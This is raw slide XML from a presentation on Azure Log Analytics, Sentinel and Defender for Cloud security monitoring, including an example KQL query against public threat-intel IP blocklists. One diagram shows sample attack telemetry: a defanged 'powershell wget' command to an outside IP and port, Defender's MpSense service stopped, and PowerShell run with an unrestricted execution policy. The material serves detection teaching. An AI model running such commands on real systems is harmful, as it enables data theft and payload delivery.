          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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nb-NO" sz="1200" b="1"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nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>VM Connection </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1200" b="1"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nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(VM Insight)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7" name="Rectangle: Rounded Corners 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B91822D0-7E98-4CC5-8A3F-2012CFC94157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183755" y="2761447"/>
            <a:ext cx="1902139" cy="940603"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DeviceFileEvents</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1200" b="1"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nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Defender for Cloud)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle: Rounded Corners 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86EB63F4-8557-4DE9-A5A6-508165733650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654348" y="2778618"/>
            <a:ext cx="1856703" cy="940603"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Change</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Azure Automation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle: Rounded Corners 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9C0BA8C-E113-4BF3-A525-460C7FC64471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790426" y="2770032"/>
            <a:ext cx="1856703" cy="940603"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Security Events (Microsoft Sentinel via Log Analytics)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6B72A64-A62E-4287-9DF0-2497EF5DBD8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857742" y="2263434"/>
            <a:ext cx="481410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rPr>
              <a:t>Windows VM i Azure</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1F1FA410-64D2-43D1-833E-F5FF2D55B8A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925322" y="2776472"/>
            <a:ext cx="1856703" cy="940603"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DeviceProcess</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Events (Defender for Cloud)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{363EBB65-08FC-4C90-A2D8-963DFE093710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762505" y="3717705"/>
            <a:ext cx="1614688"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8.8.8.8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Inbound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3389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svchost</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Russia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F21935B7-3F85-4468-A853-281A246F52A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2959743" y="3725881"/>
            <a:ext cx="6094926"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8.8.8.8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4624 - An account </a:t>
            </a:r>
            <a:b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was successfully </a:t>
            </a:r>
            <a:b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logged on.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FC87F45-E72D-49A8-975B-52F25ECA7104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5204327" y="3713557"/>
            <a:ext cx="213628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powershell</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wget</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hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH –file *.zip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09185074-7C68-43B5-86C7-1FA2CAA27015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7964420" y="3737030"/>
            <a:ext cx="2136283"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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>S</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ervice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Stopped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MpSense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234092E0-5B71-4DAE-9B27-F97E7F272A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10100167" y="3736273"/>
            <a:ext cx="2136283"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powershell.exe</a:t>
            </a:r>
            <a:b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ExecutionPolicy</a:t>
            </a:r>
            <a:b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Unrestricted</a:t>
            </a:r>
            <a:b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Neininteractive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4345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15C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485750" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Log Analytics and Sentinel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6DE8665-352C-48C2-9FCF-BD805AB6EF3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5930245" y="1104825"/>
            <a:ext cx="3937265" cy="5046494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A030A9-6D6A-47D6-94B4-D748689B591C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596563" y="742339"/>
            <a:ext cx="4102437" cy="5355720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Log Analytics –  Extra Solutions:</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DNS Insight</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Antimalware assessment</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endPar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2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Basic and Analytics Logs </a:t>
            </a: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(In preview)</a:t>
            </a:r>
            <a:endPar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2200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Sentinel with connectors to collect security events</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rPr>
              <a:t>Either Sentinel or Defender for Servers</a:t>
            </a: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rPr>
              <a:t>Microsoft Defender support is in Preview </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rPr>
              <a:t>(for data collection)</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endPar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8509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15C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485750" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Example Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A030A9-6D6A-47D6-94B4-D748689B591C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596563" y="742340"/>
            <a:ext cx="4102437" cy="4074456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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92D10453-1EED-4013-AF40-658F8EE4DC08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2540000" y="1025327"/>
            <a:ext cx="13538200" cy="47089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let IP = (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>externaldata</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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ip:string</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[@"https://rules.emergingthreats.net/blockrules/compromised-ips.txt",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@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/5.txt",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@"https://cinsscore.com/list/ci-badguys.txt",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@"https://infosec.cert-pa.it/analyze/listip.txt",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@"https://feodotracker.abuse.ch/downloads/ipblocklist_recommended.txt"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with(format="csv")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where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ip</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matches regex "(^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$)"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distinct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ip</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(union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isfuzzy</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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
